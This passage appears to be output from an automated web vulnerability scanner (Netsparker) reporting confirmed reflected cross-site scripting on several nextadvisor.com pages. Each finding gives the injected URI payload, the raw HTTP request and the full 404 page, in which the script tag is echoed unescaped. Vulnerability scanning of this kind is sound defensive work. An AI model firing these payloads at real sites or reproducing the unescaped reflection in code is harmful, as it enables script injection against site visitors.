class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E

/privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003DC)</script>

Request

GET /privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003DC)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3528
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/privacy.php'"--></style></script><script>netsparker(0x0003DC)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003DC)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FA)%3C/script%3E

/affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003FA)</script>

Request

GET /affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003FA)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3528
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/affiliate_program.php'"--></style></script><script>netsparker(0x0003FA)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003FA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%3C/script%3E

/sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0003FE)</script>

Request

GET /sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003FE)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3530
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/sitemap.php'"--></style></script><script>netsparker(0x0003FE)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > 